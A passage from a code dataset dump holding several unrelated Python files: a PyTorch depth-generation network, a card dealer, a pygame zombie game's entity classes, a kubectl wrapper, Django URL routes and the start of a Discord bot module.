up_blocks.append(UpBlockForUNetWithResNet50(in_channels=128 + 64, out_channels=128,\n up_conv_in_channels=256, up_conv_out_channels=128))\n up_blocks.append(UpBlockForUNetWithResNet50(in_channels=64 + 3, out_channels=64,\n up_conv_in_channels=128, up_conv_out_channels=64))\n\n self.up_blocks = nn.ModuleList(up_blocks)\n\n self.out = nn.Conv2d(64, n_channels, kernel_size=1, stride=1)\n\n # discriminator_blocks.append(DepthDiscriminatorBlock(3, 64))\n # discriminator_blocks.append(DepthDiscriminatorBlock(64, 128))\n # discriminator_blocks.append(DepthDiscriminatorBlock(128, 256))\n # discriminator_blocks.append(DepthDiscriminatorBlock(256, 512))\n\n # self.discriminator_blocks\n\n # self.discriminator_blocks = nn.Sequential(ConvBlock(3, 64, padding=1, kernel_size=5, stride=2, use_bn=False),\n # ConvBlock(64, 128, padding=1, kernel_size=5, stride=2),\n # ConvBlock(128, 256, padding=1, kernel_size=5, stride=2),\n # ConvBlock(256, 512, padding=1, kernel_size=5, stride=2),\n # ConvBlock(512, 512, padding=1, kernel_size=5, stride=2))\n\n # self.discriminate = nn.Linear(6*6*512, 1)\n\n self.domain_pred = nn.Sequential(nn.Linear(2048, 2048), nn.ReLU(True), nn.Dropout(),\n # nn.Linear(3072, 2048), nn.ReLU(True), nn.Dropout(),\n nn.Linear(2048, 1))\n\n self.domain_pred_conditional = nn.Sequential(nn.Linear(256, 2048), nn.ReLU(True), nn.Dropout(),\n # nn.Linear(3072, 2048), nn.ReLU(True), nn.Dropout(),\n nn.Linear(2048, 1))\n # # self.discriminator = nn.Sequential(nn.Linear(256, 3072), nn.ReLU(True), nn.Dropout(0.2),\n # nn.Linear(3072, 2048), nn.ReLU(True), nn.Dropout(0.2),\n # nn.Linear(2048, 1))\n\n def forward(self, x, x2=None, train_discrim=False, train_gen=False, train_conditional_gen=False, train_net=False, train_dom=False, train_conditional_dom=False, with_output_feature_map=False, l=1, classonehot=[]):\n\n # if train_discrim:\n\n # dis = self.discriminator_blocks(x).squeeze()\n # # dis = dis.view(-1, 6*6*512)\n # # dis = self.discriminate(dis)\n\n # return dis\n\n\n 
if train_gen:\n pre_pools = dict()\n pre_pools[\"layer_0\"] = x\n x = self.input_block(x)\n pre_pools[\"layer_1\"] = x\n x = self.input_pool(x)\n\n for i, block in enumerate(self.down_blocks, 2):\n x = block(x)\n if i == (self.depth - 1):\n continue\n pre_pools[\"layer_\"+str(i)] = x\n\n # z = self.disc_pool(x)\n x = self.bridge(x)\n\n for i, block in enumerate(self.up_blocks, 1):\n k = self.depth - 1 - i\n key = \"layer_\"+str(k)\n x = block(x, pre_pools[key])\n output_feature_map = x\n depth_gen = self.out(x)\n del pre_pools\n\n\n if with_output_feature_map:\n return depth_gen, output_feature_map\n else:\n return depth_gen\n\n elif train_conditional_gen:\n pre_pools = dict()\n pre_pools[\"layer_0\"] = x\n x = self.input_block(x)\n pre_pools[\"layer_1\"] = x\n x = self.input_pool(x)\n\n for i, block in enumerate(self.down_blocks, 2):\n x = block(x)\n if i == (self.depth - 1):\n continue\n pre_pools[\"layer_\"+str(i)] = x\n\n x = self.avgpool(x)\n x = x.view(x.size(0),-1)\n x = self.down_bottleneck(x)\n class_x = torch.cat([classonehot,x], dim=1)\n class_x = self.up_bottleneck(class_x)\n class_x = self.relu(class_x)\n class_x = class_x.view(class_x.size(0),-1, self.ksize, self.ksize)\n # print(\"Before Bridge:\",x)\n # x = self.bridge(x)\n # print(\"After Bridge:\",x)\n\n for i, block in enumerate(self.up_blocks, 1):\n k = self.depth - 1 - i\n key = \"layer_\"+str(k)\n class_x = block(class_x, pre_pools[key])\n output_feature_map = class_x\n depth_gen = self.out(class_x)\n del pre_pools\n\n\n if with_output_feature_map:\n return depth_gen, output_feature_map\n else:\n return depth_gen\n \n elif train_dom:\n pre_pools = dict()\n pre_pools[\"layer_0\"] = x\n x = self.input_block(x)\n pre_pools[\"layer_1\"] = x\n x = self.input_pool(x)\n\n for i, block in enumerate(self.down_blocks, 2):\n x = block(x)\n if i == (self.depth - 1):\n continue\n pre_pools[\"layer_\"+str(i)] = x\n\n # print(\"x\",x)\n # bridge = self.bridge(x)\n bridge = self.avgpool(x)\n bridge = 
bridge.view(bridge.size(0),-1)\n # print(\"bridge\",bridge)\n bridge_reverse = grad_reverse(bridge, l*-1)\n # print(\"bridge_reverse\",bridge_reverse)\n dom_pred = self.domain_pred(bridge_reverse)\n\n\n # for i, block in enumerate(self.up_blocks, 1):\n # k = self.depth - 1 - i\n # key = \"layer_\"+str(k)\n # x = block(x, pre_pools[key])\n # output_feature_map = x\n # depth_gen = self.out(x)\n # del pre_pools\n\n elif train_conditional_dom:\n pre_pools = dict()\n pre_pools[\"layer_0\"] = x\n x = self.input_block(x)\n pre_pools[\"layer_1\"] = x\n x = self.input_pool(x)\n\n for i, block in enumerate(self.down_blocks, 2):\n x = block(x)\n if i == (self.depth - 1):\n continue\n pre_pools[\"layer_\"+str(i)] = x\n\n # print(\"x\",x)\n # bridge = self.bridge(x)\n x = self.avgpool(x)\n x = x.view(x.size(0),-1)\n x = self.down_bottleneck(x)\n # print(\"bridge\",bridge)\n x_reverse = grad_reverse(x, l*-1)\n # print(\"bridge_reverse\",bridge_reverse)\n dom_pred = self.domain_pred_conditional(x_reverse)\n\n # for i, block in enumerate(self.up_blocks, 1):\n # k = self.depth - 1 - i\n # key = \"layer_\"+str(k)\n # x = block(x, pre_pools[key])\n # output_feature_map = x\n # depth_gen = self.out(x)\n # del pre_pools\n\n return dom_pred.squeeze()\n # elif train_net:\n\n # pre_pools = dict()\n # pre_pools[\"layer_0\"] = x\n # x = self.input_block(x)\n # pre_pools[\"layer_1\"] = x\n # x = self.input_pool(x)\n\n # for i, block in enumerate(self.down_blocks, 2):\n # x = block(x)\n # if i == (self.depth - 1):\n # continue\n # pre_pools[\"layer_\"+str(i)] = x\n\n # x = self.bridge(x)\n\n # for i, block in enumerate(self.up_blocks, 1):\n # k = self.depth - 1 - i\n # key = \"layer_\"+str(k)\n # x = block(x, pre_pools[key])\n # output_feature_map = x\n # depth_gen = self.out(x)\n # del pre_pools\n\n # dis_input = torch.cat((x2,depth_gen),0)\n\n # dis = self.discriminator_blocks(dis_input).squeeze()\n # # dis = dis.view(-1, 6*6*512)\n # # dis = self.discriminate(dis).squeeze()\n\n # if 
with_output_feature_map:\n # return dis, depth_gen, output_feature_map\n # else:\n # return dis, depth_gen\n\n else:\n return \"wrong_mode!\"","sub_path":"Object Recognition/RGBD Object Recogntion/depth_gen.py","file_name":"depth_gen.py","file_ext":"py","file_size_in_byte":13825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11869616","text":"# The deal_cards function deals a specified numberr of cards from the deck\r\n\r\ndef deal_cards(deck, number):\r\n # Initialize an accumulator for the hand value.\r\n hand_value = 0\r\n\r\n # Make sure the number of cards to deal is not geater tham the number of cards in the deck.\r\n if number > len(deck):\r\n number = len(deck)\r\n\r\n # Deal the cards and accumulate their values\r\n for count in range(number):\r\n card, value = deck.popitem()\r\n print(card)\r\n hand_value += value\r\n\r\n #Display the value of the hand.\r\n print('Value of this hand:', hand_value)\r\n\r\n# Call the main function\r\nmain()","sub_path":"card_dealer deal_cards fumction.py","file_name":"card_dealer deal_cards fumction.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311049731","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# serveur.py\r\n#\r\n# Copyright 2019 Aurélien Bück-Kaeffer\r\n#\r\n#\r\n\"\"\"\r\nCote serveur\r\nS'execute pour gerer les entites\r\n\"\"\"\r\n\r\n__author__ = [ 'Aurélien Bück-Kaeffer' ]\r\n__mail__ = 'aurelien.buck.kaeffer@gmail.com'\r\n__version__ = '0.0.1'\r\n\r\nimport pygame\r\nfrom math import atan, sqrt\r\nimport time\r\n\r\nclass objet: #Classe mere regroupant fonctions et caracteristiques communes des classes heritieres\r\n\tdef __init__ (self, type, pos, image, hitbox, health, num, angle = 0):\r\n\t\tself.type = type\r\n\t\tself.pos = { 'x' : pos[ 'x' ], 'y' : pos[ 'y' ] }\r\n\t\tself.image = image\r\n\t\tself.hitbox = 
hitbox\r\n\t\tself.health = health\r\n\t\tself.num = num\r\n\t\tself.angle = angle\r\n\t\r\n\tdef set_type ( self, type ):\r\n\t\t\"\"\"definis la nature de l'objet\"\"\"\r\n\t\tself.type = type\r\n\t\r\n\tdef get_type ( self ):\r\n\t\t\"\"\"renvoi la nature de l'objet\"\"\"\r\n\t\treturn self.type\r\n\t\r\n\tdef set_pos ( self, pos ):\r\n\t\t\"\"\"definis la position de l'objet\"\"\"\r\n\t\tself.pos = { 'x' : pos[ 'x' ], 'y' : pos[ 'y' ] }\r\n\t\t\r\n\tdef get_pos ( self ):\r\n\t\t\"\"\"renvoie les coordonnes de l'objet\"\"\"\r\n\t\treturn self.pos\r\n\r\n\tdef set_image ( self, image ):\r\n\t\t\"\"\"definis le sprite de l'objet\"\"\"\r\n\t\tself.image = image\r\n\r\n\tdef get_image ( self ):\r\n\t\t\"\"\"renvoi le sprite de l'objet\"\"\"\r\n\t\treturn self.image\r\n\t\r\n\tdef set_hitbox ( self, hitbox ):\r\n\t\t\"\"\"definis la hitbox de l'objet\"\"\"\r\n\t\tself.hitbox = hitbox\r\n\t\t\r\n\tdef get_hitbox ( self ):\r\n\t\t\"\"\"renvoi la hitbox de l'objet\"\"\"\r\n\t\treturn self.hitbox\r\n\t\r\n\tdef set_health( self, health ):\r\n\t\t\"\"\"definis la vie de l'objet\"\"\"\r\n\t\tself.health = health\r\n\t\r\n\tdef get_health( self ):\r\n\t\t\"\"\"renvoi la vie de l'objet\"\"\"\r\n\t\treturn self.health\r\n\t\r\n\tdef set_num( self, num ):\r\n\t\t\"\"\"definis la pos de l'objet\"\"\"\r\n\t\tself.num = num\r\n\t\r\n\tdef get_num( self ):\r\n\t\t\"\"\"renvoi la pos de l'objet\"\"\"\r\n\t\treturn self.num\r\n\t\r\n\tdef set_angle( self, angle ):\r\n\t\t\"\"\"definis l'angle de l'objet\"\"\"\r\n\t\tself.angle = angle\r\n\t\r\n\tdef get_angle( self ):\r\n\t\t\"\"\"renvoi l'angle de l'objet\"\"\"\r\n\t\treturn self.angle\r\n\r\nclass player(objet):\r\n\tdef __init__ (self, pseudo, type, pos, image, vitesse, hitbox, health, num, SCREEN_SIZE, v_up = 0, v_side = 0, KO = False, score = 0):\r\n\t\tobjet.__init__(self, type, pos, image, hitbox, health, num)\r\n\t\tself.pseudo = pseudo\r\n\t\tself.vitesse = vitesse\r\n\t\tself.v_up = v_up\r\n\t\tself.v_side = 
v_side\r\n\t\tself.SCREEN_SIZE = SCREEN_SIZE\r\n\t\tself.KO = KO\r\n\t\tself.score = 0\r\n \r\n\tdef set_pseudo ( self, pseudo ):\r\n\t\t\"\"\"definis le pseudo du joueur\"\"\"\r\n\t\tself.pseudo = pseudo\r\n\t\r\n\tdef get_pseudo ( self ):\r\n\t\t\"\"\"renvoi le pseudo du joueur\"\"\"\r\n\t\treturn self.pseudo\r\n\t\r\n\tdef set_vitesse( self, vitesse ):\r\n\t\t\"\"\"definis la vitesse du joueur\"\"\"\r\n\t\tself.vitesse = vitesse\r\n\t\t\r\n\tdef get_vitesse ( self ):\r\n\t\t\"\"\"renvoi la vitesse du joueur\"\"\"\r\n\t\treturn self.vitesse\r\n\t\r\n\tdef set_SCREEN_SIZE( self, SCREEN_SIZE ):\r\n\t\t\"\"\"definis la taille de l'ecran du joueur\"\"\"\r\n\t\tself.SCREEN_SIZE = SCREEN_SIZE\r\n\t\r\n\tdef get_SCREEN_SIZE( self ):\r\n\t\t\"\"\"renvoi la taille de l'ecran du joueur\"\"\"\r\n\t\treturn self.SCREEN_SIZE\r\n\t\r\n\tdef set_KO( self, time ):\r\n\t\t\"\"\"definis l'etat du joueur\"\"\"\r\n\t\tself.KO = time\r\n\t\r\n\tdef get_KO( self ):\r\n\t\t\"\"\"renvoi le moment ou il a ete mis KO si le joueur est KO, False sinon\"\"\"\r\n\t\treturn self.KO\r\n\t\r\n\tdef set_score( self, score ):\r\n\t\t\"\"\"definis le score\"\"\"\r\n\t\tself.score = score\r\n\t\r\n\tdef get_score( self ):\r\n\t\t\"\"\"renvoi le score\"\"\"\r\n\t\treturn self.score\r\n\t\r\n\tdef damage( self, damage ):\r\n\t\t\"\"\"diminue la vie du joueur de la valeur entrée\"\"\"\r\n\t\tself.health -= damage\r\n\t\tif self.health <= 0:\r\n\t\t\tself.set_KO( time.time() )\r\n\t\t\tself.set_image( 'player_dead' )\r\n\t\t\r\n\tdef mouv ( self, k_up, k_left, k_down, k_right, list_collidable):\r\n\t\t\"\"\"fonction de la classe Joueur\r\n\t\ts'occupe des déplacements\"\"\"\r\n\t\tpos = self.get_pos()\r\n\t\t# haut\r\n\t\tif k_up == \"True\":\r\n\t\t\tif self.v_up > -1 * self.vitesse:\r\n\t\t\t\tself.v_up -= self.vitesse/20\r\n\t\telse:\r\n\t\t\tif self.v_up < 0:\r\n\t\t\t\tself.v_up += self.vitesse/40\r\n\t\t\t\r\n # gauche\r\n\t\tif k_left == \"True\":\r\n\t\t\tif self.v_side > -1 * 
self.vitesse:\r\n\t\t\t\tself.v_side -= self.vitesse/20\r\n\t\telse:\r\n\t\t\tif self.v_side < 0:\r\n\t\t\t\tself.v_side += self.vitesse/40\r\n\t\t\t\r\n # bas\r\n\t\tif k_down == \"True\":\r\n\t\t\tif self.v_up < self.vitesse:\r\n\t\t\t\tself.v_up += self.vitesse/20\r\n\t\telse:\r\n\t\t\tif self.v_up > 0:\r\n\t\t\t\tself.v_up -= self.vitesse/40\r\n\t\t\t\r\n # droite\r\n\t\tif k_right == \"True\":\r\n\t\t\tif self.v_side < self.vitesse:\r\n\t\t\t\tself.v_side += self.vitesse/20\r\n\t\telse:\r\n\t\t\tif self.v_side > 0:\r\n\t\t\t\tself.v_side -= self.vitesse/40\r\n\t\t\r\n\t\tcollision_x = False\r\n\t\tcollision_y = False\r\n\t\t#Test de colision de la position future X pour determiner si le deplacement est autorise\r\n\t\tfutur_pos_x = self.hitbox.move( round(self.v_side), 0 ) \r\n\t\tfor a in range( 0, len( list_collidable ) ):\r\n\t\t\t\tif futur_pos_x.colliderect( list_collidable[a].get_hitbox() ):#Test des collisions avec les zombies\r\n\t\t\t\t\tcollision_x = True\r\n\t\t\t\t\tself.v_side = 0\r\n\t\t\r\n\t\tif collision_x == False:#Deplacement si il n'y a pas collision\r\n\t\t\tself.set_pos( { 'x' : self.pos[ 'x' ] + round(self.v_side), 'y' : self.pos[ 'y' ] } )\r\n\t\t\tself.hitbox = self.hitbox.move( round(self.v_side), 0 )\r\n\t\t\t\r\n\t\t#Test de colision de la position future Y pour determiner si le deplacement est autorise\r\n\t\tfutur_pos_y = self.hitbox.move( 0, round(self.v_up) )\r\n\t\tfor a in range( 0, len( list_collidable ) ):\r\n\t\t\t\tif futur_pos_y.colliderect( list_collidable[a].get_hitbox() ):#Test des collisions avec les zombies\r\n\t\t\t\t\tcollision_y = True\r\n\t\t\t\t\tself.v_up = 0\r\n\t\t\r\n\t\tif collision_y == False:#Deplacement si il n'y a pas collision\r\n\t\t\tself.set_pos( { 'x' : self.pos[ 'x' ], 'y' : self.pos[ 'y' ] + round(self.v_up) } )\r\n\t\t\tself.hitbox = self.hitbox.move( 0, round(self.v_up) )\r\n\t\t\r\n\tdef tir ( self, liste_zombies, pos_souris, weapon, liste_walls, size_ent ):\r\n\t\t\"\"\"fonction de la classe 
joueur\r\n\t\ts'occupe des tirs\"\"\"\r\n\t\t\r\n\t\tif weapon == 'gun':\r\n\t\t\tportee = 1000\r\n\t\telse:\r\n\t\t\tportee = 0\r\n\t\t\r\n\t\thitbox = pygame.Rect( self.pos[ 'x' ] + size_ent[ 'x' ]/2 , self.pos[ 'y' ] + size_ent[ 'y' ]/2 , 1, 1 )\r\n\t\t\r\n\t\ttouche = False\r\n\t\t\r\n\t\ttrajectoire = [0, 1]\r\n\t\t\r\n\t\tdistance = ( ( pos_souris[ 0 ] - self.pos[ 'x' ] )**2 + ( pos_souris[ 1 ] - self.pos[ 'y' ] )**2 )**0.5\r\n\t\ttrajectoire[0] = ( pos_souris[ 0 ] - ( round(self.get_SCREEN_SIZE()[ 'x' ]/2 + size_ent[ 'x' ]/2 ) ) ) / distance\r\n\t\ttrajectoire[1] = ( pos_souris[ 1 ] - ( round(self.get_SCREEN_SIZE()[ 'y' ]/2 + size_ent[ 'y' ]/2 ) ) ) / distance\r\n\t\t\r\n\t\ttrajX = self.pos[ 'x' ]\r\n\t\ttrajY = self.pos[ 'y' ]\r\n\t\t\r\n\t\twhile touche == False:\r\n\t\t\ttrajX += trajectoire[0]*30\r\n\t\t\ttrajY += trajectoire[1]*30\r\n\t\t\thitbox = hitbox.move( round(trajX-hitbox.x), round(trajY-hitbox.y) )\r\n\t\t\t\r\n\t\t\tif ( ( hitbox.x - self.pos[ 'x' ] )**2 + ( hitbox.y - self.pos[ 'y' ] )**2 )**0.5 > portee :\r\n\t\t\t\ttouche = True\r\n\t\t\thit = []\r\n\t\t\tfor x in range( 0, len( liste_zombies ) ):\r\n\t\t\t\tif hitbox.colliderect( liste_zombies[x].get_hitbox() ):\r\n\t\t\t\t\thit.append([x, 'zombies'])\r\n\t\t\t\t\ttouche = True\r\n\t\t\tfor x in range( 0, len( liste_walls ) ):\r\n\t\t\t\tif hitbox.colliderect( liste_walls[x].get_hitbox() ) and liste_walls[x].get_solide():\r\n\t\t\t\t\thit.append([x, 'terrain'])\r\n\t\t\t\t\ttouche = True\r\n\t\tdata = [ weapon, { 'x' : round( self.get_pos()[ 'x' ] + size_ent[ 'x' ]/2 ) , 'y' : round( self.get_pos()[ 'y' ] + size_ent[ 'y' ]/2 ) }, { 'x' : hitbox.x, 'y' : hitbox.y }, hit ]\r\n\t\tself.v_side -= trajectoire[0]*0.5 #recul\r\n\t\tself.v_up -= trajectoire[1]*0.5\r\n\t\treturn data\r\n\r\n\r\n\r\nclass zombies(objet):\r\n\tdef __init__ ( self, type, pos, image, vitesse, hitbox, health, num, trigger_range, v_up = 0, v_side = 0 ):\r\n\t\tobjet.__init__(self, type, pos, image, hitbox, health, 
num)\r\n\t\tself.vitesse = vitesse\r\n\t\tself.v_up = v_up\r\n\t\tself.v_side = v_side\r\n\t\tself.trigger_range = trigger_range\r\n\t\r\n\tdef set_vitesse( self, vitesse ):\r\n\t\t\"\"\"definis la vitesse de l'objet\"\"\"\r\n\t\tself.vitesse = vitesse\r\n\t\t\r\n\tdef get_vitesse ( self ):\r\n\t\t\"\"\"renvoi la vitesse de l'objet\"\"\"\r\n\t\treturn self.vitesse\r\n\t\t\r\n\t\r\n\tdef set_trigger_range( self, trigger_range ):\r\n\t\t\"\"\"definis la distance de reperage de l'objet\"\"\"\r\n\t\tself.trigger_range = trigger_range\r\n\t\t\r\n\tdef get_trigger_range( self ):\r\n\t\t\"\"\"renvoi la distance de reperage de l'objet\"\"\"\r\n\t\treturn self.trigger_range\r\n\t\r\n\tdef mouv ( self, list_player, list_collidable ):\r\n\t\t\"\"\"deplacement du zombie\"\"\"\r\n\t\tif len(list_player) != 0:\r\n\t\t\tplayer_pos = list_player[0].get_pos()\r\n\t\telse:\r\n\t\t\tplayer_pos = self.pos\r\n\t\tfor x in range( 0, len(list_player) ):\r\n\t\t\ta = list_player[x].get_pos()[ 'y' ]\r\n\t\t\tif abs( ( list_player[x].get_pos()[ 'x' ] - self.pos[ 'x' ] )**2 + ( list_player[x].get_pos()[ 'y' ] - self.pos[ 'y' ] )**2 ) < abs( ( player_pos[ 'x' ] - self.pos[ 'x' ] )**2 + ( player_pos[ 'y' ] - self.pos[ 'y' ] )**2 ): #test pour determiner le joueur le plus proche\r\n\t\t\t\tplayer_pos = list_player[x].get_pos()\r\n\t\t\r\n\t\tif abs( ( player_pos[ 'x' ] - self.pos[ 'x' ] )**2 + ( player_pos[ 'y' ] - self.pos[ 'y' ] )**2 ) < self.trigger_range**2:\r\n\t\t\t\t\r\n\t\t\tif player_pos[ 'x' ] < self.pos[ 'x' ]: #si le joueur est sur la gauche\r\n\t\t\t\tif self.v_side > -1 * self.vitesse/100 * self.health:\r\n\t\t\t\t\tself.v_side -= self.vitesse/20\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.v_side = -1 * self.vitesse/100 * self.health\r\n\t\t\telse:\r\n\t\t\t\tif self.v_side < 0: #sinon ralentis progressivement\r\n\t\t\t\t\tself.v_side += self.vitesse/40\r\n\t\t\t\r\n\t\t\tif player_pos[ 'x' ] > self.pos[ 'x' ]:#si le joueur est sur la droite\r\n\t\t\t\tif self.v_side < self.vitesse/100 * 
self.health:\r\n\t\t\t\t\tself.v_side += self.vitesse/20\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.v_side = self.vitesse/100 * self.health\r\n\t\t\telse:\r\n\t\t\t\tif self.v_side > 0:#sinon ralentis progressivement\r\n\t\t\t\t\tself.v_side -= self.vitesse/40\r\n\t\t\t\r\n\t\t\tif player_pos[ 'y' ] < self.pos[ 'y' ]:#si le joueur est au dessus\r\n\t\t\t\tif self.v_up > -1 * self.vitesse/100 * self.health:\r\n\t\t\t\t\tself.v_up -= self.vitesse/20\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.v_up = -1 * self.vitesse/100 * self.health\r\n\t\t\telse:\r\n\t\t\t\tif self.v_up < 0:#sinon ralentis progressivement\r\n\t\t\t\t\tself.v_up += self.vitesse/40\r\n\t\t\t\r\n\t\t\tif player_pos[ 'y' ] > self.pos[ 'y' ]:#si le joueur est au dessous\r\n\t\t\t\tif self.v_up < self.vitesse/100 * self.health:\r\n\t\t\t\t\tself.v_up += self.vitesse/20\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.v_up = self.vitesse/100 * self.health\r\n\t\t\telse:\r\n\t\t\t\tif self.v_up > 0:#sinon ralentis progressivement\r\n\t\t\t\t\tself.v_up -= self.vitesse/40\r\n\t\t\t\r\n\t\t\tcollision_x = False\r\n\t\t\tcollision_y = False\r\n\t\t\t#Test de colision de la position future X pour determiner si le deplacement est autorise\r\n\t\t\tfutur_pos_x = self.hitbox.move( round(self.v_side), 0 )\r\n\t\t\tfor a in range( 0, len( list_collidable ) ):\r\n\t\t\t\tif futur_pos_x.colliderect( list_collidable[a].get_hitbox() ):#Test des collisions avec les zombies\r\n\t\t\t\t\tcollision_x = True\r\n\t\t\t\t\tself.v_side = 0\r\n\t\t\t\t\tif list_collidable[a].get_image() == 'player':\r\n\t\t\t\t\t\tlist_collidable[a].damage( 150 )\r\n\t\t\t\t\t\r\n\t\t\tif collision_x == False:#Deplacement si il n'y a pas collision\r\n\t\t\t\tself.set_pos( { 'x' : self.pos[ 'x' ] + round(self.v_side), 'y' : self.pos[ 'y' ] } )\r\n\t\t\t\tself.hitbox = self.hitbox.move( round(self.v_side), 0 )\r\n\t\t\t\r\n\t\t\t#Test de colision de la position future Y pour determiner si le deplacement est autorise\r\n\t\t\tfutur_pos_y = self.hitbox.move( 0, round(self.v_up) 
)\r\n\t\t\tfor a in range( 0, len( list_collidable ) ):\r\n\t\t\t\tif futur_pos_y.colliderect( list_collidable[a].get_hitbox() ):#Test des collisions avec les zombies\r\n\t\t\t\t\tcollision_y = True\r\n\t\t\t\t\tself.v_up = 0\r\n\t\t\t\t\tif list_collidable[a].get_image() == 'player':\r\n\t\t\t\t\t\tlist_collidable[a].damage( 50 )\r\n\t\t\t\r\n\t\t\tif collision_y == False:#Deplacement si il n'y a pas collision\r\n\t\t\t\tself.set_pos( { 'x' : self.pos[ 'x' ], 'y' : self.pos[ 'y' ] + round(self.v_up) } )\r\n\t\t\t\tself.hitbox = self.hitbox.move( 0, round(self.v_up) )\r\n\tdef orientation( self ):\r\n\t\t\"\"\"orientation du zombie en fonction de sa vitesse x et y\"\"\"\r\n\t\t\r\n\t\tif round(self.v_side) == 0:\r\n\t\t\tif self.v_up > 0.5:\r\n\t\t\t\tself.set_angle( 90 )\r\n\t\t\telif self.v_up < -0.5 :\r\n\t\t\t\tself.set_angle( 270 )\r\n\t\t\r\n\t\telse:\r\n\t\t\tself.set_angle( -1 * atan( round(self.v_up)/round(self.v_side) ) * 50 )\r\n\r\n\t\t\tif self.v_side > 0:\r\n\t\t\t\tself.set_angle( self.get_angle() - 180 )\r\n\r\nclass terrain( objet ):\r\n\tdef __init__( self, type, pos, taille, image, hitbox, health, num, solide ):\r\n\t\tobjet.__init__(self, type, pos, image, hitbox, health, num)\r\n\t\tself.solide = solide\r\n\t\tself.taille = taille\r\n\tdef set_solide( self, solide ):\r\n\t\t\"\"\"definis si l'objet est solide ou non\"\"\"\r\n\t\tself.solide = solide\r\n\tdef get_solide( self ):\r\n\t\t\"\"\"renvoi True si l'objet est solide et False si il ne l'est pas\"\"\"\r\n\t\treturn self.solide\r\n\tdef set_taille ( self, taille ):\r\n\t\t\"\"\"definis la taille de l'objet\"\"\"\r\n\t\tself.taille = { 'x' : taille[ 'x' ], 'y' : taille[ 'y' ] }\r\n\r\n\tdef get_taille ( self ):\r\n\t\t\"\"\"renvoi la taille de l'objet\"\"\"\r\n\t\treturn self.taille\r\n\tdef get_visible( self, pos_player, liste_opaque ):\r\n\t\tprint(liste_opaque)\r\n\t\thitbox = pygame.Rect( self.pos[ 'x' ] + self.taille[ 'x' ]/2 , self.pos[ 'y' ] + self.taille[ 'y' ]/2 , 1, 1 
)\r\n\t\t\r\n\t\tvisible = False\r\n\t\ttouche = False\r\n\t\t\r\n\t\ttrajectoire = [0, 1]\r\n\t\t\r\n\t\tdistance = ( ( pos_player[ 'x' ] - self.pos[ 'x' ] )**2 + ( pos_player[ 'y' ] - self.pos[ 'y' ] )**2 )**0.5\r\n\t\tif distance < 1000:\r\n\t\t\ttrajectoire[0] = ( pos_player[ 'x' ] + self.get_taille()[ 'x' ]/2 ) / distance\r\n\t\t\ttrajectoire[1] = ( pos_player[ 'y' ] + self.get_taille()[ 'y' ]/2 ) / distance\r\n\t\t\t\r\n\t\t\ttrajX = self.pos[ 'x' ]\r\n\t\t\ttrajY = self.pos[ 'y' ]\r\n\t\t\t\r\n\t\t\twhile not touche:\r\n\t\t\t\ttrajX += trajectoire[0]*20\r\n\t\t\t\ttrajY += trajectoire[1]*20\r\n\t\t\t\thitbox = hitbox.move( round(trajX-hitbox.x), round(trajY-hitbox.y) )\r\n\t\t\t\t\r\n\t\t\t\tif ( ( hitbox.x - self.pos[ 'x' ] )**2 + ( hitbox.y - self.pos[ 'y' ] )**2 )**0.5 > distance :\r\n\t\t\t\t\ttouche = True\r\n\t\t\t\t\tprint(1)\r\n\t\t\t\thit = []\r\n\t\t\t\tfor x in range( 0, len( liste_opaque ) ):\r\n\t\t\t\t\tif hitbox.colliderect( liste_opaque[x].get_hitbox() ):\r\n\t\t\t\t\t\tvisible = True\r\n\t\t\t\t\t\ttouche = True\r\n\t\t\t\t\t\tprint(2)\r\n\t\treturn visible\r\n\r\nclass spawner( objet ):\r\n\tdef __init__( self, type, pos, taille, image, hitbox, health, num, solide ):\r\n\t\tobjet.__init__(self, type, pos, image, hitbox, health, num)\r\n\t\tself.taille = taille\r\n\tdef set_taille ( self, taille ):\r\n\t\t\"\"\"definis la taille de l'objet\"\"\"\r\n\t\tself.taille = { 'x' : taille[ 'x' ], 'y' : taille[ 'y' ] }\r\n\r\n\tdef get_taille ( self ):\r\n\t\t\"\"\"renvoi la taille de l'objet\"\"\"\r\n\t\treturn self.taille\r\n\tdef spawn_( self, list_zombies, list_player ):\r\n\t\tusable = True\r\n\t\tfor x in range(0, len(list_zombies) ):\r\n\t\t\tif self.hitbox.colliderect( list_zombies[x].get_hitbox() ):\r\n\t\t\t\tusable = False\r\n\t\tfor x in range(0, len(list_player) ):\r\n\t\t\tif sqrt(( list_player[x].get_pos()[ 'x' ] - self.pos[ 'x' ] )**2 + ( list_player[x].get_pos()[ 'y' ] - self.pos[ 'y' ] )**2 ) > 1500:\r\n\t\t\t\tusable = 
False\r\n\t\treturn usable\r\n","sub_path":"version lycée/entites.py","file_name":"entites.py","file_ext":"py","file_size_in_byte":14648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339312883","text":"import subprocess\n\n\nclass K8s(object):\n\n def __init__(self, server, token, namespace, opts):\n self.base_cmd = 'kubectl --server={server} --token={token}' \\\n ' -n {namespace} {opts} '.format(server=server,\n token=token,\n namespace=namespace,\n opts=opts)\n\n def apply(self, template):\n apply_command = 'cat </edit/', ReviewUpdateView.as_view(), name='edit_review'\n ),\n ##### VIEWS FOR STAFF USER ONLY #####\n # listview for all reviews, button to publish/reject\n path('staff-review/', StaffReviewListView.as_view(), name='staff_reviews')\n]\n","sub_path":"reviews/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528928485","text":"import random\nimport requests\nimport asyncio\nimport bot.cakebot_config as cakebot_config\n\nfrom bot.modules.ModuleInterface import ModuleInterface\nfrom bot.modules.helpers import is_integer\nfrom bot.modules.misc import misc_help, misc_consts\n\n\nclass MiscModule(ModuleInterface):\n async def timed_cats(self, message):\n async def inner(m):\n times, duration_str = MiscModule._parse_duration_str(m.content.split())\n unit_time = misc_consts.time_map[duration_str][0]\n\n unit = misc_consts.time_map[duration_str][1]\n unit_plural = misc_consts.time_map[duration_str][2]\n\n if times == 1:\n unit_plural = unit\n\n await self.say(\n m.channel,\n \"Sending cats every {} for {} {}!\".format(unit, times, 